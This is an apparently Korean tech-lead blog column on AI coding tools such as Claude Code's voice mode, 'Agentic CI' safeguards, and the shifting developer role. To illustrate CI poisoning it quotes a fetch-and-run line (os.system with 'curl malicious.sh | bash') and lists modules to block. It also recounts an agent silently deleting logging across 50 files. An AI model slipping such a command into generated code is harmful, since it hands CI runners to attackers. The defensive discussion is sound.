AI가 코드 짜고 테스트까지: 개발자는 이제 뭘 해야 하나

"인증 미들웨어 리팩토링해 줘." 말 한마디에 Claude Code가 코드를 고친다. Anthropic이 Claude Code에 음성 모드(Voice Mode)를 탑재하면서 개발자와 AI의 협업 방식이 또 한 번 달라졌다. /voice 커맨드 하나면 키보드 없이도 코딩 세션이 시작된다. 현재는 전체 사용자의 5%에게 단계적으로 배포 중이지만, 이건 단순한 UX 편의 기능이 아니다. 코딩 워크플로우의 입력 방식 자체가 바뀌고 있다는 신호다.

그런데 여기서 잠깐. "AI가 코드를 써주는 것"과 "AI가 쓴 코드를 믿고 배포하는 것"은 완전히 다른 문제다. Dev.to에 올라온 Agentic CI 아티클은 이 간극을 정확히 짚는다. 코드 리팩토링 에이전트가 "concise하게"라는 프롬프트 한 줄을 받고, 50개 파일의 logger.info() 구문을 통째로 삭제한 실제 사례가 등장한다. 관측 대시보드가 조용히 꺼졌다. 이틀 뒤에야 발견됐다.

더 심각한 건 보안이다. LLM에게 코드와 테스트를 동시에 생성하게 하고, 그 테스트를 GitHub Actions에서 그대로 실행하면? import os; os.system("curl malicious.sh | bash") 같은 할루시네이션이 CI 러너를 직접 장악할 수 있다. 이른바 CI Poisoning이다. AI가 생성한 코드는 '신뢰할 수 없는 외부 입력'으로 취급해야 한다는 걸, 우리는 아직 완전히 내면화하지 못하고 있다.

해법으로 제시된 Agentic CI 패턴은 명확하다. 에이전트 출력물을 즉시 실행하지 않고, AST(추상 구문 트리) 파싱으로 위험 모듈(os, subprocess, socket 등)을 정적으로 차단한다. 로깅 구문 보존 여부를 코드 실행 전에 검증한다. 그리고 GitHub Actions의 토큰 권한을 contents: read로 최소화한다. 동적 실행은 이 모든 정적 게이트를 통과한 뒤에만 허용된다. 에이전트를 마이크로서비스처럼, 즉 '항상 의심하고 검증하는' 방식으로 다루는 것이다.

이쯤 되면 자연스러운 질문이 생긴다. AI가 코드를 짜고, Agentic CI가 검증하고, Ralph Loop가 대규모 리팩토링을 끝까지 돌리고, Git Worktrees로 병렬 피처 개발이 돌아가면—개발자는 대체 뭘 하나? Claude Code 고급 기능 가이드(dev.to)가 소개하는 Agent Teams, MCP, Code Review 플러그인까지 합치면 AI가 기획-코딩-테스트-리뷰를 전부 커버하는 그림이 된다.

Dev.to의 'The 10x Developer is Dead' 아티클은 이 질문에 직접 답한다. 핵심은 이렇다: AI는 10배 개발자의 신화를 죽였지만, 동시에 '판단력 있는 1x 개발자'를 역사상 가장 강력한 포지션으로 올려놨다. 타이핑 속도도, 알고리즘 암기력도 아니다. AI가 건네는 무한한 옵션 앞에서 무엇을 수용하고, 무엇을 거절하고, 무엇을 세 번 더 다듬을지 아는 감각—그게 새로운 스펙이다.

이 아티클이 제시하는 세 가지 역량은 테크 리드 관점에서 팀 리빌딩의 기준이 될 수 있다. Judgment: AI 제안을 맥락 안에서 평가할 수 있는가. Taste: '충분히 좋은 코드'와 '기술 부채를 쌓는 코드'를 구별하는 안목. Context: 티켓에 적히지 않은 비즈니스 의도와 엣지 케이스를 읽는 능력. AI는 토큰을 본다. 개발자는 결과를 본다.

실제로 AI 도구들의 성장 지표는 이 전환이 이미 가속 중임을 보여준다. Anthropic에 따르면 Claude Code의 연간 반복 수익(ARR)은 25억 달러를 넘었고, 주간 활성 사용자는 올해 초 대비 두 배로 늘었다. 음성 모드, Agentic CI, 멀티 에이전트 협업—이 모든 게 동시에 성숙해가고 있다. 변화의 속도가 개발자의 적응 속도를 앞서기 시작했다.

테크 리드로서 내가 팀에 가장 자주 하는 말이 있다. "AI가 생성해준 걸 기반으로 우리가 다듬으면 된다." 그런데 지금은 여기에 하나를 더 붙여야 할 것 같다. "다듬기 전에, 믿을 수 있는지부터 검증하자." AI-First 워크플로우의 진짜 과제는 AI를 빠르게 쓰는 것이 아니라, AI 출력물을 안전하게 신뢰하는 구조를 설계하는 것이다. Agentic CI가 그 구조의 시작점이고, 판단력 있는 개발자가 그 구조를 운영하는 사람이다.

앞으로 6개월을 예상해본다. 음성 모드는 전체 사용자로 확대될 것이고, Agentic CI 패턴은 표준 CI/CD 템플릿에 흡수될 것이다. Agent Teams의 'experimental' 딱지도 곧 떨어질 가능성이 높다. 그때 살아남는 개발자는 AI를 가장 많이 쓴 사람이 아니라, AI를 가장 잘 감독한 사람이다. 완벽주의는 비싸졌고, 배포는 미덕이 됐다. 그리고 그 배포의 품질을 책임지는 건 여전히 사람의 몫이다.

AI가 코드 짜고 테스트까지: 개발자는 이제 뭘 해야 하나

출처